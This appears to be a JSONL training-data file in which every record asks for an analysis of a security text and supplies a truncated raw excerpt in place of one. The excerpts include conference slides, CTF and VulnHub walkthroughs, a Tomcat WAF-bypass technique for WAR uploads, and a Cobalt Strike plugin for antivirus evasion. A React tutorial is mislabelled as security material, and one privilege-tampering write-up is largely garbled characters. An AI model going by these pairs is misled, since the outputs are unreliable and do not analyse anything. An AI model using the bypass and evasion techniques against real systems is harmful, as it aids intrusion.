[记录一次企业官网被挂马的排查过程](https://blog.csdn.net/weixin_44578334/article/details/109530118) - [New campaign targeting security researchers](https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/) - [当黑客不讲武德 安全专家也容易被骗](https://paper.seebug.org/1471/) - [A deeper dive into our May 2019 security incident](https://stackoverflow.blog/2021/01/25/a-deeper-dive-into-our-may-2019-security-incident/) - [Abusing cloud services to fly under the radar](https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/) - [回忆一次百转千回的应急响应 | 技术精选0127](https://mp.weixin.qq.com/s/DYaD83Fl-fivHq6CFL6m9g) - [应急响应入门](https://mp.weixin.qq.com/s/8jVcSAf7iO0dWNPv7C7tcA) - [实战 | 记一次网吧", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Data Retention Small Sister your Digital Privacy Self Defense (brenno@smallsister.org) Brenno de Winter, wgasa  From the Netherlands  Self proclaimed geek  First program at age 5  Focus on security, privacy  Writing, training, consulting  Wanna know more? Beer makes me talk! Privacy and anonimity are needed to safeguard free speech Program  The wake-up call  The issue at hand  Small Sister can help  Digital Privacy Self Defense Program The wake-up call  The issue at hand  Small Sister can help  Digital Privacy Self Defense Defcon 2007 Thou shall not like Segways I got arrested for photographing a railway working on a Segway Cool guy! Inflation of civil rights  Cartoons taken offline without judges order  Cartonist jailed without a need  Photographers hindered in public space  Laptop searches at the border  Policing websites for forbidden statements  Demanding IP-address for writing ticket Monitoring in the Netherlands  Massive use of CCTV  Public Transportation Card stores trips for seven years  System for paying road tax will photograph license plates on many locations  Anti-childporn firewall routes to police Program  The wake-up call  The issue at hand  Small Sister can help  Digital Privacy Self Defense Privacy & Anonimity  Privacy: the level of control over your information  Anonimity: Doing something without the other knowing your identity EUs Data Retention  Directive  Finding out whos talking to whom  Whos e-mailing whom  Who owns which IP and which phone#  Use to prevent crime  Determining groups of people Issue for  Journalists with whistle blowers  Anonymous tipping to police  Lawyers, doctors, priests, etc.  Political activists Other issues  Most people dont care, until ....  Most PETs are user-unfriendly  Many people are unaware  Few users make solutions less effective  Border searches for user data Program  The wake-up call  The issue at hand  Small Sister can help  Digital Privacy Self Defense Small Sister  Open Source Project that:  Doesnt reinv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 温习Redux中相关的React知识点 ## 组件间数据传递 React核心思想就是数据和程序分离用state进行状态的控制用props进行数据间传递 ### 利用`state`和`props`进行组件间数据传递 #### 核心思想 >通过子组件修改父组件的 state 然后把父组件的 state 作为所有子组件的 props 值传入各个子组件 #### 创建父组件 1. 创建组件`App` 2. 将我们需要的数据放在`state`里 3. 写一个`handleClick`方法进行修改数据 4. 将`handleClick`方法传入`CommentBox`组件中 5. `handleClick`方法的参数为子组件获取的值 6. 将`state`的值传入子组件 ```js import React, { Component } from 'react' import CommentBox from './CommentBox' class App extends Component { state = { data: '' } handleClick(data){ this.setState({data:data}) } render() { console.log('App:',this.state.data) return ( <div className=\"App\"> <CommentBox data={this.state.data} handleClick={this.handleClick.bind(this)} /> </div> ) } } export default App ``` #### 子组件`CommentBox` 1. 创建组件`CommentBox` 2. 通过`ref`抓取虚拟节点 3. 通过`this.props.handleClick`拿到父组件传过来的`handleClick`方法 4. 通过子组建的`handleClick`方法来获取`input`内输入的`value`传给父组件 5. 通过`props`拿到父组件传过来的值根据对应的名称 ```js import React from 'react' class CommentBox extends React.Component{ state = { data: this.props.data } handleClick(){ this.props.handleClick(this.comment.value) this.setState({data:this.props.data}) } render(){ let {data} = this.state //Es6对象的解构赋值 return( <div> { data.map(item => <li>{item}</li>) } <input className='input' type='text' ref={value=>this.comment=value} /> <input type='button' value='传给父组件' onClick={this.handleClick.bind(this)} /> </div> ) } } export default CommentBox ``` ## 关于触发`render`的条件 1. 组件的`state`发生改变 ```js import React from 'react' class App extends React.Component { state = { data:1 } handleClick(){ this.setState({data:0}) } render(){ console.log('render被触发') return( <div> <button onClick={this.handleClick.bind(this)}>点击</button> </div> ) } } export default App; ``` 2. 组件的`props`发生改变 ```js //父组件 import React, { Component } from 'react'; import Son from './Son'; class App extends Component { constructor() { super(); this.state = { data: 1 } } handleClick(e){ e.preventDefault(); this.setState({ data: this.state.data + 1 }) } render(){ return( <div> <S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Strange Game Category: Misc., 100 Points ## Description > It's just winning a simple game. > > What could go wrong? ## Solution Let's connect to the attached service: ```console (user@kali)-[/media/sf_CTFs/checkpoint/Strange_Game] $ nc strange-game.csa-challenge.com 4444 ================== Strange Game ==================  We take turns picking numbers from 1 to 9.  The same number can't be chosen twice.  First player to hold 3 numbers which, when added, make 15, wins.  If all numbers are exhausted without a winner, the game is a tie.  We will play 15 rounds of this game, alternating who goes first.  Win or tie all 15 rounds and I'll give you the flag. Press any key... ``` Sounds simple enough. Let's try to play: ``` Round 1! ================================================== New game I'll go first. ================================================== Available moves: 1 2 3 4 5 6 7 8 9 Past moves: Player One: None Player Two: None Game still in progress I choose to play 4. ================================================== ================================================== Available moves: 1 2 3 5 6 7 8 9 Past moves: Player One: 4 Player Two: None Game still in progress Choose your move: 6 ================================================== ================================================== Available moves: 1 2 3 5 7 8 9 Past moves: Player One: 4 Player Two: 6 Game still in progress I choose to play 8. ================================================== ================================================== Available moves: 1 2 3 5 7 9 Past moves: Player One: 8 4 Player Two: 6 Game still in progress Choose your move: 3 ================================================== ================================================== Available moves: 1 2 5 7 9 Past moves: Player One: 8 4 Player Two: 3 6 Game still in progress I choose to play 2. ================================================== ================================================== Available moves: 1 5 9 7 Past moves: Playe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n探寻Tomcat件上传流量层绕waf新姿 势 探寻Tomcat件上传流量层绕waf新姿势 写在前 Pre 前置 深 变形 更新2022-06-20 扩利 更新Spring 2022-06-20 Spring4 Spring5 参考章 写在前 意中看到ch1ng师傅的章觉得很有趣不得不感叹师傅太厉害了但我看那长篇的函 数总觉得会有更骚的东西所幸还真的有借此机会就发出来探究竟同时也不得不感慨 下RFC档的妙处当然本针对的技术也仅仅只是在流量层上waf的绕过 Pre 很神奇对吧当然这不是终点,接下来我们就来探究竟 前置 这简单说下师傅的思路 部署与处理上传war的servlet是 org.apache.catalina.manager.HTMLManagerServlet 在件上传时最终会通过处 理 org.apache.catalina.manager.HTMLManagerServlet#upload 调的是其类实现 类 org.apache.catalina.core.ApplicationPart#getSubmittedFileName 这获取filename的时候的处理很有趣 看到这段注释发现在RFC 6266档当中也提出这点 Avoid including the \"\\\" character in the quoted-string form of the filename parameter, as escaping is not implemented by some user agents, and \"\\\" can be considered an illegal path character. 那么我们的tomcat是如何处理的嘞这它通过函数 HttpParser.unquote 去进处理 简单做个总结如果位是 \" (前提条件是有 \\ 字符)那么就会去掉跳过从第个字符开 始并且末尾也会往前移动位同时会忽略字符 \\ 师傅只提到了类似 test.\\war 这样的 例 但其实根据这个我们还可以进步构造些看着较恶的如 filename=\"\"y\\4.\\w\\arK\" public static String unquote(String input) { if (input == null || input.length() < 2) { return input; } int start; int end; // Skip surrounding quotes if there are any if (input.charAt(0) == '\"') { start = 1; end = input.length() - 1; } else { start = 0; end = input.length(); } StringBuilder result = new StringBuilder(); for (int i = start ; i < end; i++) { char c = input.charAt(i); if (input.charAt(i) == '\\\\') { i++; result.append(input.charAt(i)); } else { result.append(c); } } return result.toString(); } 深 还是在 org.apache.catalina.core.ApplicationPart#getSubmittedFileName 当中 看到这个将字符串转换成map的操作总觉得会有更骚的东西(这先是解析传的参数 再获取如果解析过程有利点那么也会影响到后参数获取)不扯远继续回到正题 先它会获取header参数 Content-Disposition 当中的值如果以 form-data 或 者 attachment 开头就会进我们的解析操作跟进去看果不其然看 到 RFC2231Utility 瞬间不困了 后这坨就不必多说了相信家已经很熟悉啦持QP编码忘了的可以考古看看我之前 写的章Java件上传杀器-绕waf(针对commons-fileupload组件)这就不再重复这个啦 我们重点看三元运算符前的这段 既然如此我们先来看看这个hasEncodedValue判断标准是什么字符串末尾是否带 * public static boolean hasEncodedValue(final String paramName) { if (paramName != null) { return paramName.lastIndexOf('*') == (paramName.length() - 1); } return false; } 在看解密函数之前我们可以先", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nspy vs. spy examining spyware on mobile devices michael robinson | christopher taylor Zarious @ zarious.deviantart.com Introduc=on: The newest spy Spyware can easily run on mobile devices. Its in malware and its commercially available. hBp://www.computerweekly.com/Ar=cles/2011/09/12/247857/Mobile-malware-up-273-in-first-half-of-2011.htm NickiBot: - Spyware (GPS monitoring, sound recording, call logs, e-mail uploading) - Fully controlled by SMS messages - Appears as Android System Log under installed applica=ons (See www.csc.ncsu.edu/faculty/jiang/NickiBot.) NickiBot Spyware and Zsone hBp://www.pcworld.com/businesscenter/ar=cle/217133/ soundminer_android_malware_listens_then_steals_phone_data.html Soundminer - Monitors phone calls (voice and keypad) - Sends credit card data over the network - Paired app with another Trojan hBp://slashnext.com/2011/08/mobile-malware-threats-grow-now-they-can-steal-photos-from-your-phone/ F-Secure: Photoscraping for harassment and blackmail. hBp://www.unplggd.com/unplggd/safety-security/does-your-smartphone-need-an=virus-protec=on-156222 ScarleB Johansson Jessica Alba Julianne Hough Heather Morris Miley Cirus Mila Kunis Olivia Munn Ashley Greene Bri=sh Royalty Commercializa=on of spyware hBp://www.android-apps.us/monitor/security-sogware/blackberry-spyware/ hBp://www.android-apps.us/monitor/security-sogware/blackberry-spyware/ Did you catch the list of compa=ble devices? hBp://www.android-apps.us/monitor/security-sogware/blackberry-spyware/ And this is the short list. Some commercial versions dont require roo=ng of the phone.* * iPhones need to be jailbroken. So what does it do? Commercial spyware may capture: SMS ac=vity Loca=on/GPS coordinates Pictures Videos Inbound/outbound call logs Browser ac=vity (URLs) E-mail Iden=fy SIM card changes Interac=ve mode may include: Taking pictures Recording videos Record conversa=ons/background via calls Wiping the phone Viewing the target phones screen Harvested data sent back to a server. Interne", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2007 Computer Academic Underground  2007 Computer Academic Underground Real-time Steganography Real-time Steganography with RTP with RTP I)ruid I)ruid <druid@caughq.org> <druid@caughq.org> http://druid.caughq.org http://druid.caughq.org  2007 Computer Academic Underground  2007 Computer Academic Underground Who am I? Who am I? Founder, Computer Academic Underground (CAU) Founder, Computer Academic Underground (CAU) Co-Founder, Austin Hackers Association (AHA!) Co-Founder, Austin Hackers Association (AHA!) Employed by TippingPoint DVLabs performing VoIP security Employed by TippingPoint DVLabs performing VoIP security research research  2007 Computer Academic Underground  2007 Computer Academic Underground Overview Overview VoIP, RTP, and Audio Steganography VoIP, RTP, and Audio Steganography Previous Research Previous Research Real-Time Steganography Real-Time Steganography Using steganography with RTP Using steganography with RTP Problems and Challenges Problems and Challenges SteganRTP SteganRTP About, Goals, Etc. About, Goals, Etc. Architecture, Operational Flow Architecture, Operational Flow Message Structures Message Structures Functional Subsystems Functional Subsystems Challenges Met Challenges Met Live Demo Live Demo Conclusions, Future Work Conclusions, Future Work Q&A Q&A  2007 Computer Academic Underground  2007 Computer Academic Underground VoIP? RTP? VoIP? RTP? Voice over IP Voice over IP Internet Telephony Internet Telephony Real-time Transport Protocol Real-time Transport Protocol Used by most VoIP systems to transmit call audio data Used by most VoIP systems to transmit call audio data  2007 Computer Academic Underground  2007 Computer Academic Underground Audio Steganography Audio Steganography In 6 slides or less... In 6 slides or less...  2007 Computer Academic Underground  2007 Computer Academic Underground Steganography? Steganography? Steganos (covered) graphein (writing) Steganos (covered) graphein (writing) Hiding a secret message within a co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Rsabin (crypro, 314p, 37 solves) > Classical things? > [rsabin-a51076632142e074947b08396bf35ab2.tgz](rsabin.tgz) ### PL [ENG](#eng-version) Z dołączonego do zadania pliku tgz wypakowujemy dwa kolejne - [rsabin.py](rsabin.py) (kod szyfrujący coś) oraz [cipher.txt](cipher.txt) (wynik wykonania go). Kod szyfrujący wygląda tak: ```python from Crypto.Util.number import * p = getPrime(157) q = getPrime(157) n = p * q e = 31415926535897932384 flag = open('flag').read().strip() assert len(flag) == 50 m = int(flag.encode('hex'), 16) c = pow(m, e, n) print 'n =', n print 'e =', e print 'c =', c ``` A dane tak: ``` n = 20313365319875646582924758840260496108941009482470626789052986536609343163264552626895564532307 e = 31415926535897932384 c = 19103602508342401901122269279664114182748999577286972038123073823905007006697188423804611222902 ``` N jest na tyle małe, że można go sfaktoryzować (albo znaleźć w factordb): ``` p = 123722643358410276082662590855480232574295213977 q = n / p ``` Na pierwszy rzut oka szyfrowanie wygląda na klasyczne RSA. Uwagę przykuwa jednak dość nietypowy wybór eksponenty szyfrującej `e`. Jej dalsza analiza pozwala stwierdzić, że całe szyfrowanie jest wykonane `niepoprawnie`, ponieważ eksponenta nie spełnia założenia `gcd(e, (p-1)(q-1)) == 1`. Brak tego założenia sprawia, że RSA nie może poprawnie zdekodować zaszyfrowanej wiadomości. Faktoryzacja `e` pozwala stwierdzić że ma ona `25` w swoim rozkładzie na czynniki i z tego powodu ma wspólne dzielniki z `(p-1)(q-1)`. Musimy się więc pozbyć tego czynnika z wykładnika. Kilka godzin czytania na temat RSA oraz arytmetyki modularnej pozwala nam dojść do wniosku, że możemy wykorzystać Algorytm Rabina (stąd też zapewne gra słów w tytule zadania) aby pozbyć się niechcianego czynnika z eksponenty. RSA koduje dane poprzez: `cipher_text = (plain_texte)%n` Algorytm Rabina szyfruje jako: `cipher_text = (plain_text2)%n` W naszym przypadku możemy przyjąć, że `e = e'*32` i uzyskujemy dzięki temu: `cipher_text = (plain_t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom library import * import sys with open(sys.argv[1], \"w\") as f: for i in range(int(sys.argv[2])): while True: inp = \"\".join(chr(random.randint(0, 255)) for _ in range(16)) if \"\\n\" not in inp: break save_sample(f, inp)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnet user author /domain Gabriel Ryan Security Engineer @ Gotham Digital Science Appsec | Penetration Testing | Red Team | Research @s0lst1c3 gryan@gdssecurity.com labs@gdssecurity.com Target Identification Within A Red Team Environment Target Identification Within A Red Team Environment Well executed wireless attacks require well executed recon Target Identification Within A Red Team Environment Typical wireless assessment:  Tightly defined scope  Client provides set of in-scope ESSIDs  You may be limited to certain access points Target Identification Within A Red Team Environment Red team engagements:  Scope loosely defined  Scenario based: demonstrated that a scenario is possible (i.e. CREST)  Open: completely compromise infrastructure of target organization  Loose rules dictating what you can and cant do Target Identification Within A Red Team Environment Typical red team rules of engagement make wireless target identification very messy. Target Identification Within A Red Team Environment: Example Scenario Target Identification Within A Red Team Environment Evil Corp has requested that your firm perform a full scope red team assessment of their infrastructure over a five week period.  57 offices across US and Europe  Most locations have one or more wireless networks  Evil Corp particularly interested in wireless as attack vector Target Identification Within A Red Team Environment Arrive at client site, perform site-survey Scoping A Wireless Assessment: Red Team Style Sequential BSSID Patterns Linguistic Inference The process of identifying access points with ESSIDs that are linguistically similar to words or phrases that the client uses to identify itself. OUI Prefixes Geographic Cross-referencing Evil Corp has 57 locations worldwide, If 1. We see the same ESSIDs appear at two Evil Corp locations 2. AND no other 3rd party is present at both of these locations as well We can conclude that the ESSID is used by Evil Corp. Before we continue... Attempt to decloak an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PumpkinFestival-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶机地址** - https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/ **Description** Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinFestival is Level 3 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file. Level 2 is about identifying pumpkin seeds. In this level (Level 3) it is time for Pumpkin Festival, the goal is to reach root and access PumpkinFestival_Ticket and collect PumpkinTokens on the way. **知识点** - 字符加解密 - ssh密钥使用 - wpscan **实验环境** `环境仅供参考` - VMware Workstation 15 Pro - 15.0.0 build-10134415 - kali : NAT 模式,192.168.141.134 - 靶机 : NAT 模式 --- # 前期-信息收集 开始进行 IP 探活 ```bash nmap -sP 192.168.141.0/24 ``` 排除法,去掉自己宿主机网关,这里 `192.168.141.130` 是靶机的地址 扫描开放端口 ```bash nmap -T5 -A -v -p- 192.168.141.130 ``` 似曾相识啊,ftp 允许匿名登录 ```bash ftp 192.168.141.130 anonymous 密码为空,直接回车 ls cd secret ls get token.txt bye cat token.txt PumpkinToken : 2d6dbbae84d724409606eddd9dd71265 ``` 获得了个 token,之后应该会用到,看看 web 网页源码中的 token ``` PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52 ``` 看下 robots.txt 在 http://192.168.141.130/store/track.txt 中可以找到一个 Tracking code 和一个邮箱 下一步在host中添加上面的邮箱域名 ``` echo \"192.168.141.130 pumpkins.local\" >> /etc/hosts ``` 访问可以发现一个 wordpress 页面和 token ``` PumpkinToken : 06c3eb12ef2389e2752335beccfb2080 ``` 除了这个域名以外还有一个 token 路径,爆破出 http://192.168.141.130//tokens/token.txt 第四个 token ``` PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea ``` 下面用 wpscan 尝试打 wordpress ```bash wpscan --url http://pumpkins.local -e at -e ap -e u ``` 发现2个用户和一个readme - http://pumpkins.local/readme.html 访问发现是个加密字符串,像是 base64,解出来是 base62 ``` K82v0SuvV1En350M0uxi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 IceRiver版本Q.V简单说明 前 些功能使介绍 Self Inject模式 由于CS 4.6版本之后官对ts和client端做了代码分离ts端由java to native技术做了编译因此后 续版本对ts端的修改将不再那么容易所以前所做的开主要集中在client端IceRiver今后的计划 是保持CS的稳定性规避内存和为查杀添加实性插件结合其他开源项更效的应于实 战 这个插件是从4.4版本的IceRiver就已经存在的在4.7版本实现式有了变动但对于户侧使法 不变默认情况下可以看到beacon的inject配置显示为\"default\". 这个时候执些后渗透的模块如screenshot将会采spawn模式在beacon侧将会采fork & inject & resume也就是注傀儡进程执RDI 前 些功能使介绍 Self Inject模式 2 由于注傀儡进程的操作太敏感已经被各杀软加为名单这为了在不改beacon端代码的前 提下通过修改client发送到ts端的指令由spawn改成inject来实现绕过为查杀 选择其中条session右键可以看到IceRiver菜单点击SelfInject界上的inject显示由default变 成less 这个时候再次使screenshot模块可以看到由spawn模式改成了inject到beacon所在进程的模式 3 点击DisableSelfInject模式将会再次回到default 这时再次使screenshot验证beacon为可以看到再次回到了默认的spawn模式 4 SelfInjectFull插件是计划持第三定义native dll.net assembly注beacon身前还在实现 和测试验证当中", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[root@sslvpn /]# netstat -tulnp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:9990 0.0.0.0:* LISTEN 25124/node tcp 0 0 0.0.0.0:51111 0.0.0.0:* LISTEN 20491/updateme tcp 0 0 0.0.0.0:4009 0.0.0.0:* LISTEN 11698/lmdlan tcp 0 0 127.0.0.1:51981 0.0.0.0:* LISTEN 11698/lmdlan tcp 0 0 0.0.0.0:909 0.0.0.0:* LISTEN 24905/dualserver tcp 0 0 0.0.0.0:6001 0.0.0.0:* LISTEN 25107/boa tcp 0 0 0.0.0.0:6002 0.0.0.0:* LISTEN 25107/boa tcp 0 0 0.0.0.0:8118 0.0.0.0:* LISTEN 1867/nginx: master tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 512/sshd: /usr/sbin tcp 0 0 0.0.0.0:442 0.0.0.0:* LISTEN 25291/pipd tcp 0 0 127.0.0.1:7005 0.0.0.0:* LISTEN 25338/redis-server tcp 0 0 172.17.59.167:7005 0.0.0.0:* LISTEN 25338/redis-server tcp 0 0 127.0.0.1:1981 0.0.0.0:* LISTEN 21322/logs tcp6 0 0 :::1000 :::* LISTEN 23137/conhttpd tcp6 0 0 :::4430 :::* LISTEN 23137/conhttpd tcp6 0 0 :::8848 :::* LISTEN 529/httpd tcp6 0 0 :::22 :::* LISTEN 512/sshd: /usr/sbin tcp6 0 0 :::443 :::* LISTEN 529/httpd udp 0 0 0.0.0.0:909 0.0.0.0:* 24905/dualserver udp 0 0 0.0.0.0:54179 0.0.0.0:* 25341/session_check udp 0 0 0.0.0.0:35849 0.0.0.0:* 25712/proxyworker udp 0 0 0.0.0.0:58385 0.0.0.0:* 25329/proxyworker udp 0 0 0.0.0.0:33893 0.0.0.0:* 24803/proxy udp 0 0 0.0.0.0:54409 0.0.0.0:* 25124/node udp 0 0 0.0.0.0:48291 0.0.0.0:* 383/dnsd udp 0 0 0.0.0.0:7359 0.0.0.0:* 11698/lmdlan udp 0 0 0.0.0.0:58564 0.0.0.0:* 25319/proxyworker udp 0 0 0.0.0.0:52451 0.0.0.0:* 25328/proxyworker udp 0 0 0.0.0.0:56582 0.0.0.0:* 24819/alarmmailsnd udp 0 0 0.0.0.0:36148 0.0.0.0:* 25316/proxyworker udp 0 0 0.0.0.0:56738 0.0.0.0:* 24815/node udp 0 0 0.0.0.0:56778 0.0.0.0:* 25318/proxyworker udp 0 0 0.0.0.0:36394 0.0.0.0:* 1082/svcstaytraced udp 0 0 0.0.0.0:48699 0.0.0.0:* 25153/tsmanager udp 0 0 0.0.0.0:44672 0.0.0.0:* 25705/redis_counter udp 0 0 0.0.0.0:54956 0.0.0.0:* 24672/AuditLogs udp 0 0 0.0.0.0:38574 0.0.0.0:* 25221/pipc udp 0 0 0.0.0.0:46796 0.0.0.0:* 25128/i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n湖论剑 WriteUp By Nu1L 湖论剑 WriteUp By Nu1L Reverse ROR TacticalArmed Web EZupload OA?RCE? 灏妹的web EasyTp Pwn Blind string_go easykernel Misc 签到 Crypto unknown_dsa FilterRandom SpecialCurve2 hardrsa 密码集合 Reverse ROR from z3 import * des = [ 0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB, 0x87, 0x7F, 0x9A, 0x9C, 0xB1, 0xDF, 0x65, 0x8F, 0x9D, 0x39, 0x8F, 0x11, 0xF6, 0x8E, 0x65, 0x42, 0xDA, 0xB4, 0x8C, 0x39, 0xFB, 0x99, 0x65, 0x48, 0x6A, 0xCA, 0x63, 0xE7, 0xA4, 0x79] s_box = [ 0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B, 0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7, 0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF, 0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2, 0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C, 0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE, 0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC, 0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98, 0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED, 0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8, 0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04, 0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8, 0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4, 0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9, 0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72, 0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62, 0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA, 0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A, 0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3, 0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84, 0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F, 0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1, 0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF, 0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB, 0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1, 0x1B, 0xFB, 0x", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 前言 !\"#$%&'('))*)'('+,-)+./00'123456789:;<= >?@ABC=DEFGHIJKLMNOPQRSTUVW 0x02 渗透日常单点登录 @A XYZ[\\]]_`aabbbbcbbbbbbbcd+eafa*_-.a0+gh, i]ej=klmnLopqBCrstu )h.-)+b vw=xyz{ |}~=ƒz{|=-jg- vw7ˆŠŒ ~Ž' C=Ro=Šošœ žŸ =  ]+ªª '- ]+ªªªª=u *._*h]- 6 7² ³$}=µyvwky #$¹º¼½ky ¾µ³$ÀÁyÂpÃ~Än-=ÅÃy-Æ 67 ÇÈkoÉÊ~Ë u}ÃÌy- /e/,bbbb' bbbb =ÍÎÏк=Ñ ÒÓÔpÑÒ=-ÂpÕn-=rÖØÙyŠ TÌš}HÚÛuÃÌy=-T=ÜÝÞ? TU=ßpÝÞ?ÑÒ=àpáâIJã}=kä-å æpçšÜèéåy=Üpê 0x02 Fuzz 目录出现转机 ëìpísëìy=îï )*ðð @=ÚÛQñçšaò_a@=ó pÅ ò_ @67=ôõöPÃíÈvwy=ÚÛø #$z{| *,hd+j- ùT=ÚÛRú #$ ò_)h,j-.'('*._*h]-'=ûüÃßçýyþÿ vw!HQBC=ÚÛ \"p'Š#~$~Š% &'()=mn 0+g+*]*w+pŠ,m$-=./0Õ Íкy-=ÚÛkl½1y-2Õly(=p3(n=ó p67}=45z{| d++6h- 78vw 9:=2/0Õn;<=(=>~n 0+g+*] ?~(@A=ÚÛRBCD iš \\]]_`aabbbbc]-,d-,]cd+eafa*_-.a0+gh, ' Etu /ebbbb' 'FGHIJ '=KÝÞ¼ÑÒ=àpšLñ s½1uL-Ž ³$ÐMy}=ÚÛyklÂoNO!yÕnI½1~(n=P Qq-R=Â,mS¼TUVâWXYZnˆ[\\Ì~] 78¼)kÄnBC=_`aD~TU=Nbcmdˆ=ÚÛ O!ûü ò_ eflyÿg=pmhQižjy=ø kokl~=9:!m'+0/bbbbcbbbbbbcd+e'ÆJ6789 :=É5O!>?yno=#$ ))*) ÚÛQñR³,mšuy' /h ÿg'=通过 f12 调试器得到如图 接下来就很好办了通过 burpsuite 抓包修改 JSON 中的 level 值一发入魂 访问站点 支付宝查询行业经理信息 最后通过该域名站点 cookie 共用的功能直接无登录再次拿下某后台 0x03 总结 从单点登录无法利用 ->ffuf 接口->fuzz 可用子域->get 后台", "category": "text_analysis", "source": "security_papers"}
